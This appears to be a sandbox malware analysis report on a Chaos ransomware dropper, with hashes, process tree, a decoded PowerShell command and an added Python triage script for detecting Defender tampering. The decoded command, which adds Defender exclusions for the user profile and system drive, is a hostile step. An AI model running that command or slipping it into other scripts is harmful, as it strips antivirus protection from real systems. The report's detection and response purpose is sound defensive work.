Analysis
- max time kernel: 149s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 14-03-2024 19:27
Static task
- static1
Behavioral task behavioral1
- Sample: Version 6.8.exe
- Resource: win7-20240221-en
Behavioral task behavioral2
- Sample: Version 6.8.exe
- Resource: win10v2004-20240226-en
General
- Target: Version 6.8.exe
- Size: 1.3MB
- MD5: 5b5065f49718bd167911f12eec35a942
- SHA1: fe005ea9e2e572c79e881e1c57a21585a9577841
- SHA256: 4265e1f20a3443c5d9401bc2a27d4014ae75c931d60dcd87124e9d01a943a66e
- SHA512: e33adb710d12380b8cb00c2092ab43f7eb7d2488d07ddee5fba360c0858f8113a008d99780a4da6f35fccc81b3a18058a266481714c8040d57041923d35ab9bb
- SSDEEP: 24576:a67Q2xXDBqBdEa+rfhtb5VUkxD/eL+wP+wJtXJtZW6N9VgWVB:aYQ2xXDBUdGNr5xD/SPpXtWiHgmB
Malware Config
Signatures
- Chaos
  Ransomware family first seen in June 2021.
- Chaos Ransomware (2 IoCs)
  resource | yara_rule
  C:\Users\Admin\AppData\Roaming\Version 2.8.exe | family_chaos
  behavioral2/memory/4988-17-0x00000000000C0000-0x00000000000FE000-memory.dmp | family_chaos
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | Version 6.8.exe
- Executes dropped EXE (1 IoC)
  pid | process
  4988 | Version 2.8.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (29 IoCs)
  pid | process
  4988 | Version 2.8.exe (27 events)
  2872 | powershell.exe (2 events)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 4988 | Version 2.8.exe
  Token: SeDebugPrivilege | 2872 | powershell.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  description | pid | process | target process
  PID 1708 wrote to memory of 2872 | 1708 | Version 6.8.exe | powershell.exe
  PID 1708 wrote to memory of 2872 | 1708 | Version 6.8.exe | powershell.exe
  PID 1708 wrote to memory of 4988 | 1708 | Version 6.8.exe | Version 2.8.exe
  PID 1708 wrote to memory of 4988 | 1708 | Version 6.8.exe | Version 2.8.exe
  Both targets are children that PID 1708 itself spawned. A parent writing into a process it has just created is also what CreateProcess does while setting up the child, so this signature on its own does not establish code injection; the dropper's real evasion step is the PowerShell command line shown in the process tree.
Processes
- C:\Users\Admin\AppData\Local\Temp\Version 6.8.exe
  "C:\Users\Admin\AppData\Local\Temp\Version 6.8.exe"
  PID: 1708
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZABpACMAPgA="
    Decoded (-EncodedCommand is base64 over UTF-16LE): <#xqg#>Add-MpPreference <#nun#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mxp#> -Force <#rdi#>
    The dropper adds Microsoft Defender exclusions for the user profile and the whole system drive before launching the payload; the <# ... #> block comments carry no code and only break naive string matching on the command.
    PID: 2872
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Roaming\Version 2.8.exe
    "C:\Users\Admin\AppData\Roaming\Version 2.8.exe"
    PID: 4988
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
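The encoded PowerShell command on PID 2872 is the part of this report a responder has to act on, and its shape (base64 of UTF-16LE, junk block comments, Add-MpPreference with -ExclusionPath) recurs across Chaos builds. The script below is an added triage example, not code from the report or from the sample: it extracts the -EncodedCommand argument from a process command line, decodes it with the right encoding, strips the <# #> comments, and flags Defender-exclusion tampering (ATT&CK T1562.001). The DEFENDER_TAMPER table, the function names and the handling of the short flag forms are this example's own assumptions; the only report data it uses is the PID 2872 command line.

```python
"""Decode and triage a PowerShell -EncodedCommand argument (added example)."""
import base64
import re
from typing import Dict, List, Optional

# Command line of PID 2872, copied from the process tree of this report.
CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand '
    '"PAAjAHgAcQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4A'
    'dQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoA'
    'VQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYA'
    'ZQApACAAPAAjAG0AeABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZABpACMAPgA="'
)

# powershell.exe accepts -EncodedCommand and the documented short forms -e, -ec, -enc.
ENC_FLAG = re.compile(r'(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+"?([A-Za-z0-9+/=]+)')
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)

# Hypothetical indicator table for this triage script (an assumption of the example,
# not taken from the report). Keys are lower-case so matching is case-insensitive.
DEFENDER_TAMPER: Dict[str, str] = {
    "add-mppreference": "adds a Defender exclusion or preference (ATT&CK T1562.001)",
    "set-mppreference": "changes a Defender preference (ATT&CK T1562.001)",
    "-exclusionpath": "path excluded from Defender scanning",
    "-exclusionprocess": "process excluded from Defender scanning",
    "-exclusionextension": "file extension excluded from Defender scanning",
}


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand (or a short form), if present."""
    m = ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop <# ... #> comments (junk inserted to break naive string signatures)
    and collapse the whitespace they leave behind."""
    return " ".join(BLOCK_COMMENT.sub("", script).split())


def exclusion_paths(script: str) -> List[str]:
    """Pull the array literal passed to -ExclusionPath, e.g. @($env:UserProfile,$env:SystemDrive)."""
    m = re.search(r"-ExclusionPath\s+@\((.*?)\)", script, re.IGNORECASE)
    return [p.strip() for p in m.group(1).split(",")] if m else []


def triage(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and flag Defender tampering."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False, "script": None, "indicators": {},
                "exclusion_paths": [], "defender_tamper": False}
    script = strip_block_comments(decode_encoded_command(b64))
    lowered = script.lower()
    hits = {k: v for k, v in DEFENDER_TAMPER.items() if k in lowered}
    return {
        "encoded": True,
        "script": script,
        "indicators": hits,
        "exclusion_paths": exclusion_paths(script),
        # Only the cmdlets change state; a bare parameter name is supporting evidence.
        "defender_tamper": any(k.endswith("mppreference") for k in hits),
    }


if __name__ == "__main__":
    result = triage(CMDLINE)
    print(result["script"])
    for name, meaning in result["indicators"].items():
        print(f"  {name}: {meaning}")
    print("exclusion paths:", result["exclusion_paths"])
```

On a host that ran this sample, the matching check is `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath`; an entry for the profile or the system drive that nobody added on purpose is removed with `Remove-MpPreference -ExclusionPath <path>`. The script keys off the cmdlet names rather than the comment-padded raw string precisely because the padding changes between builds while the cmdlet does not.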
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 223KB
  MD5: 77a0989f046d5404700debc97727ca2b
  SHA1: d0bdfdc67862e0bfa491d5d4a3313382a7921625
  SHA256: 99b88ce97064536c370e630245018b15bf87c0c1113e2c4c95bfb7dc1078b647
  SHA512: f918e3bf1d488cb77f06ede3d565396b8a6391f372e79fd6d148e1afec311143332bd91cb6d3f05fd6b348d40bfd4ae02adc79e20c6031aaa08c1d29d5b83aa9